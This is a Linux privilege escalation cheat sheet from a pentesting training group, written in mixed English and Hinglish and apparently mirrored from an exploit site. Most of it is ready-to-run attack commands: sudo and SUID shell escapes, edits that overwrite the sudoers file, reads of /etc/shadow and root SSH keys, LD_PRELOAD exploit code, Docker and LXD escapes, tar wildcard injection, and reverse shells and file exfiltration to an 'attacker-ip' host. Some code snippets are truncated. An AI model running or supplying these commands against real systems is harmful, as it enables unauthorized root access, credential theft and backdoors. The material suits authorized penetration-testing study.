Share
## https://sploitus.com/exploit?id=400910D4-2275-5838-8B06-6A1687B364FC
# ๐ฅ Cyber Public School โ Linux Privilege Escalation Ultra Guide
Advanced Enumeration | Sudo Abuse | SUID | Capabilities | Cron | Kernel | Docker | NFS | LXD | Wildcard | PATH | LD_PRELOAD | SSH | Password Hunting
Maintained by: Cyber Public School
Level: OSCP | Red Team | Real-World Pentesting
---
๐ ๏ธ Must-Have Linux Privilege Escalation Tools (with Links)
๐ 1๏ธโฃ LinPEAS (Linux Privilege Escalation Awesome Script)
Automated enumeration script for privilege escalation.
๐ https://github.com/carlospolop/PEASS-ng/releases/latest
๐ 2๏ธโฃ pspy (Process Snooper for Priv Esc)
Shows processes/cron activities without root.
๐ https://github.com/DominicBreuker/pspy
๐ 3๏ธโฃ Linux Exploit Suggester
Suggests possible kernel exploits based on version.
๐ https://github.com/mzet-/linux-exploit-suggester
# 1๏ธโฃ BASIC ENUMERATION
## System Info
```bash
whoami
id
groups
hostname
uname -a
uname -r
arch
cat /etc/issue
cat /etc/os-release
lsb_release -a
```
## Process Enumeration
```bash
ps aux
ps -ef
top
htop
pstree
```
## Network Enumeration
```bash
ip a
ifconfig
route -n
netstat -tulpn
ss -tulpn
arp -a
๐ Network Interfaces & IP Info
baship a
ip addr show
ifconfig -a
cat /etc/network/interfaces
hostname -I
๐ Routing & ARP
baship route
route -n
arp -a
ip neigh
cat /etc/hosts
๐ Active Connections & Open Ports
bashss -tulnp
netstat -tulnp
netstat -antp
ss -anp
lsof -i
๐ฅ Firewall Rules
bashiptables -L -v -n
iptables -t nat -L
cat /etc/iptables/rules.v4
ufw status verbose
nft list ruleset
๐ก DNS & Name Resolution
bashcat /etc/resolv.conf
cat /etc/hosts
nslookup localhost
dig @ -x
๐ Network Services & Credentials
bash# Find network config files with credentials
grep -r "password" /etc/network/ 2>/dev/null
find / -name "*.conf" | xargs grep -l "password" 2>/dev/null
# SSH keys
find / -name "id_rsa" 2>/dev/null
find / -name "authorized_keys" 2>/dev/null
cat ~/.ssh/known_hosts
๐ NFS Shares
bashshowmount -e
cat /etc/exports
mount | grep nfs
๐ Useful Files to Check
bashcat /etc/hosts.allow
cat /etc/hosts.deny
cat /proc/net/tcp # Active TCP connections (hex format)
cat /proc/net/udp
cat /proc/net/arp
```
## Environment Variables
```bash
env
printenv
echo $PATH
echo $USER
```
---
# 2๏ธโฃ USER ENUMERATION
```bash
cat /etc/passwd
cat /etc/shadow
getent passwd
getent group
last
lastlog
```
## Check for Password Reuse
```bash
grep -i password *
history
cat ~/.bash_history
```
---
# 3๏ธโฃ SUDO ABUSE
```bash
๐ Basic sudo Enumeration
bashsudo -l # Current user ke sudo permissions
sudo -ll # Detailed format
sudo -l -U # Specific user ke permissions
sudo -V # Sudo version (vulnerability check)
----------------------------------------------------------------------
๐ Sudo Config Files
bashcat /etc/sudoers
cat /etc/sudoers.d/*
ls -la /etc/sudoers.d/
visudo -c # Config syntax check
------------------------------------------------------------------------
โก Common sudo -l Outputs & Exploitation
1๏ธโฃ ALL Permissions (Full Root)
bash# Output:
# (ALL : ALL) ALL
sudo su
sudo bash
sudo sh
sudo -s
sudo passwd root
2๏ธโฃ NOPASSWD - Password ke bina root
bash# Output:
# (ALL) NOPASSWD: ALL
sudo su -
sudo bash
sudo /bin/bash
๐ ๏ธ GTFOBins - Binary Exploitation
๐ Text Editors
bash# vim
sudo vim -c ':!/bin/bash'
sudo vim -c ':!sh'
# nano
sudo nano
# Ctrl+R โ Ctrl+X โ reset; sh 1>&0 2>&0
# less
sudo less /etc/passwd
# ! โ !/bin/bash
# more
sudo more /etc/passwd
# !/bin/bash
# vi
sudo vi -c ':!/bin/sh'
-----------------------------------------------------------------
๐ Scripting Languages
bash
# Python
sudo python -c 'import os; os.system("/bin/bash")'
sudo python3 -c 'import os; os.system("/bin/bash")'
sudo python -c 'import pty; pty.spawn("/bin/bash")'
# Perl
sudo perl -e 'exec "/bin/bash";'
sudo perl -e 'exec "/bin/sh";'
# Ruby
sudo ruby -e 'exec "/bin/bash"'
# PHP
sudo php -r 'system("/bin/bash");'
sudo php -r 'passthru("/bin/bash");'
# Lua
sudo lua -e 'os.execute("/bin/bash")'
# Node.js
sudo node -e 'require("child_process").spawn("/bin/bash", {stdio: [0,1,2]})'
# awk
sudo awk 'BEGIN {system("/bin/bash")}'
# Tcl
sudo tclsh
exec /bin/bash @stdout 2>@stderr
-----------------------------------------------------------------------
๐ฆ File Operations
bash# cp (passwd file overwrite)
sudo cp /bin/bash /tmp/rootbash
sudo chmod +s /tmp/rootbash
/tmp/rootbash -p
# mv
sudo mv /etc/sudoers /tmp/
# (sudoers remove karke bypass)
# dd
echo "user ALL=(ALL) NOPASSWD: ALL" | sudo dd of=/etc/sudoers
# tee
echo "user ALL=(ALL) NOPASSWD: ALL" | sudo tee -a /etc/sudoers
# cat
sudo cat /etc/shadow
sudo cat /root/.ssh/id_rsa
๐ Network Tools
bash# curl
sudo curl file:///etc/shadow
sudo curl -o /etc/sudoers http:///sudoers
# wget
sudo wget http:///shell.sh -O /tmp/shell.sh
sudo wget --post-file=/etc/shadow http:///
# nmap (older versions)
sudo nmap --interactive
# nmap> !sh
# nmap script
echo "os.execute('/bin/sh')" > /tmp/shell.nse
sudo nmap --script=/tmp/shell.nse
---------------------------------------------------------------------------
๐๏ธ Archive Tools
bash# tar
sudo tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/bash
# zip
sudo zip /tmp/test.zip /tmp/test -T --unzip-command="sh -c /bin/bash"
# 7z
sudo 7z a /tmp/test.7z /tmp/test -r
---------------------------------------------------------------------------
โ๏ธ System Binaries
bash# find
sudo find / -exec /bin/bash \;
sudo find /tmp -exec bash -i \;
# bash
sudo bash
sudo bash -p
# ash/sh/dash/ksh/zsh
sudo ash
sudo sh
sudo dash
sudo zsh
# env
sudo env /bin/bash
# strace
sudo strace -o /dev/null /bin/bash
# xargs
echo /bin/bash | sudo xargs -L1
# time
sudo time /bin/bash
# watch
sudo watch -x bash -c 'reset; exec bash 1>&0 2>&0'
---------------------------------------------------------
๐ Editors & Viewers
bash# man
sudo man man
# !/bin/bash
# git
sudo git help config
# !/bin/bash
sudo git -p help
# !/bin/bash
# ftp
sudo ftp
# ! /bin/bash
# mysql
sudo mysql -e '\! /bin/bash'
# sqlite3
sudo sqlite3 /dev/null '.shell /bin/sh'
-------------------------------------------------------------
๐ Sudo with Specific Binary Path
bash# Agar output ho:
# (root) NOPASSWD: /usr/bin/python3 /opt/script.py
# Check karo script writable hai kya
ls -la /opt/script.py
echo 'import os; os.system("/bin/bash")' >> /opt/script.py
sudo /usr/bin/python3 /opt/script.py
๐ Environment Variables Abuse
bash# sudo -l mein dekho:
# env_keep+=LD_PRELOAD ya env_keep+=PYTHONPATH
# LD_PRELOAD Exploit
cat > /tmp/shell.c
#include
#include
void _init() {
unsetenv("LD_PRELOAD");
setuid(0); setgid(0);
system("/bin/bash");
}
EOF
gcc -fPIC -shared -o /tmp/shell.so /tmp/shell.c -nostartfiles
sudo LD_PRELOAD=/tmp/shell.so
# PYTHONPATH Exploit
mkdir /tmp/pylib
cat > /tmp/pylib/os.py # Non-interactive
# /proc se sudo token steal
ls -la /proc/*/fd 2>/dev/null | grep pts
sudo -l
sudo -V
```
### Common Exploits
```bash
sudo vim -c ':!/bin/bash'
sudo nano
sudo less /etc/profile
sudo find . -exec /bin/sh \; -quit
sudo python3 -c 'import os; os.system("/bin/bash")'
sudo perl -e 'exec "/bin/bash";'
```
---
# 4๏ธโฃ SUID EXPLOITATION
```bash
find / -perm -4000 -type f 2>/dev/null
```
Common SUID Abuse:
```bash
find . -exec /bin/sh -p \; -quit
cp /bin/bash /tmp/bash
chmod +s /tmp/bash
/tmp/bash -p
```
---
# 5๏ธโฃ SGID FILES
```bash
find / -perm -2000 -type f 2>/dev/null
```
---
# 6๏ธโฃ WRITABLE FILES
```bash
find / -writable -type f 2>/dev/null
find / -writable -type d 2>/dev/null
```
---
# 7๏ธโฃ CRON JOBS
```bash
cat /etc/crontab
ls -la /etc/cron*
crontab -l
```
Exploit:
```bash
echo "/bin/bash -c 'bash -i >& /dev/tcp/attacker-ip/4444 0>&1'" >> script.sh
```
๐ Basic Cron Enumeration
bash# Current user ke cron jobs
crontab -l
# Root ke cron jobs
crontab -l -u root
crontab -u root -l
# Sab users ke cron jobs
for user in $(cat /etc/passwd | cut -f1 -d:); do
echo "=== $user ===";
crontab -l -u $user 2>/dev/null;
done
๐ Cron Config Files
bashcat /etc/crontab
cat /etc/cron.d/*
ls -la /etc/cron.d/
ls -la /etc/cron.daily/
ls -la /etc/cron.hourly/
ls -la /etc/cron.weekly/
ls -la /etc/cron.monthly/
# Spool directory
cat /var/spool/cron/*
cat /var/spool/cron/crontabs/*
ls -la /var/spool/cron/crontabs/
# Anacron
cat /etc/anacrontab
ls -la /var/spool/anacron/
๐ต๏ธ Hidden Cron Jobs Dhundna
bash# System wide cron search
grep -r "cron" /etc/ 2>/dev/null
find /etc -name "*cron*" 2>/dev/null
find /var/spool -name "*cron*" 2>/dev/null
# Cron log files
cat /var/log/cron
cat /var/log/cron.log
cat /var/log/syslog | grep cron
cat /var/log/auth.log | grep cron
grep "CRON" /var/log/syslog
โก pspy - Hidden Cron Monitor (Best Tool)
bash# Download & Run
wget https://github.com/DominicBreuker/pspy/releases/download/v1.2.0/pspy64
chmod +x pspy64
./pspy64
# 32-bit system ke liye
./pspy32
# Verbose mode
./pspy64 -v
# 9๏ธโฃ CAPABILITIES
```bash
getcap -r / 2>/dev/null
```
Exploit Python:
```bash
python3 -c 'import os; os.setuid(0); os.system("/bin/bash")'
```
---
# ๐ NFS
```bash
showmount -e target-ip
mount -t nfs target-ip:/share /mnt
```
---
# 11๏ธโฃ DOCKER ESCAPE
```bash
docker ps
docker images
docker run -v /:/mnt --rm -it alpine chroot /mnt sh
```
---
# 12๏ธโฃ LXD ESCAPE
```bash
lxc image list
lxc init alpine mycontainer -c security.privileged=true
lxc config device add mycontainer mydevice disk source=/ path=/mnt/root recursive=true
lxc start mycontainer
lxc exec mycontainer /bin/sh
```
---
# 13๏ธโฃ KERNEL EXPLOITS
```bash
uname -r
searchsploit linux kernel
gcc exploit.c -o exploit
./exploit
```
---
# 14๏ธโฃ PASSWORD HUNTING
```bash
grep -R "password" / 2>/dev/null
grep -R "passwd" / 2>/dev/null
```
Check config files:
```bash
cat /var/www/html/config.php
cat wp-config.php
```
---
# 15๏ธโฃ SSH KEYS
```bash
ls -la ~/.ssh
cat ~/.ssh/id_rsa
```
---
# 16๏ธโฃ WILDCARD EXPLOIT
```bash
touch -- --checkpoint=1
touch -- --checkpoint-action=exec=sh shell.sh
```
---
# 17๏ธโฃ LD_PRELOAD
Create exploit.c:
```c
#include
#include
#include
void _init() {
setuid(0);
system("/bin/bash");
}
```
Compile:
```bash
gcc -fPIC -shared -o exploit.so exploit.c -nostartfiles
sudo LD_PRELOAD=./exploit.so program
```
---
# 18๏ธโฃ TAR PRIV ESC
```bash
echo "bash -i >& /dev/tcp/attacker-ip/4444 0>&1" > shell.sh
chmod +x shell.sh
touch -- --checkpoint=1
touch -- --checkpoint-action=exec=sh shell.sh
```
---
# 19๏ธโฃ AUTOMATED TOOLS
```bash
wget http://attacker-ip/linpeas.sh
chmod +x linpeas.sh
./linpeas.sh
```
```bash
wget http://attacker-ip/pspy
chmod +x pspy
./pspy
```
---
# 20๏ธโฃ FULL ENUM WORKFLOW
1. whoami
2. sudo -l
3. SUID
4. Writable files
5. Cron
6. Capabilities
7. Docker/LXD
8. Kernel
9. Password hunting
10. Automation
---
# ๐ Cyber Public School
OSCP | Red Team | Real-World Pentesting
Building Elite Ethical Hackers